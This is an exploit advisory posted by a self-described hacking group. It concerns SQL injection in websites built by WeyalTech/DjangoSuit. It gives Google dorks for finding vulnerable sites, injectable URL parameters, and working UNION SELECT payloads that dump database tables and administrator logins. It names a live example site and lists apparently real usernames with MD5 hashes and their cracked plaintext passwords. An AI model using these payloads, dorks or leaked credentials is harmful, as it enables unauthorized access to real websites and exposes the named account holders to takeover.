################################################################################################# # Exploit Title : Designed By WeyalTech Developed By DjangoSuit Company SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/07/2018 # Vendor Homepages : weyaltech.com ~ djangosuit.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Another Title : Designed by WeyalTech DjangoSuit Web Development Company Afghanistan SQL Injection Vulnerability # Google Dorks : intext:''Designed by WeyalTech'' intext:''Copyright © 2013 DjangoSuit.com'' intext:''Developed by DjangoSuit.com'' # Exploits : /fullstory.php?id=[SQL Inj] /images.php?im_album_id=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj] /category.php?CatID=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj] /images.php?im_album_id=[SQL Inj] /category.php?CatID=[SQL Inj] /videos.php?vidcat=[SQL Inj] /video_fullstory.php?vidid=[SQL Inj] Below is the Manually SQL Injection Attack Scenario => Check Version of the Database Information => 127.0.0.1/fullstory.php?id=-68456+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--%20- Check Table Names of the Database Information => 127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+fr​om+information_schema.tables+where+table_schema=database()--%20- Check Column + Table Name of the Database Information => 127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15+f​rom+information_schema.columns+where+table_name=0x7573657273--%20- Check Administrators Owners Login Name and Password Information => 127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13​,14,15+from+users-- - admin:127498072c4615a301b5695af88ad47c Samiullah Elam:e3fb7e8333d762d2f19ae811adbc6619 Gul-Sarai1:87a49a29def42b847f958deee851e6bf Farid-Matoonwal:c8184106e280eeade72d27d99b32433f 127498072c4615a301b5695af88ad47c MD5 : weyaleya4Dol e3fb7e8333d762d2f19ae811adbc6619 MD5 : Bator-Zwan 87a49a29def42b847f958deee851e6bf MD5 : De-Zra-Tasal1 c8184106e280eeade72d27d99b32433f MD5 : Rohi-Baba Administration Control Panel Paths => /cp/login.php /admin/login/?next=/admin/ ################################################################################################# # Example Site => rohi.af/fullstory.php?id=68456%27 => [ Proof of Concept ] => archive.is/xJm1D # SQL Database Errors => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 You're seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard page generated by the handler for this status code. #68456 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################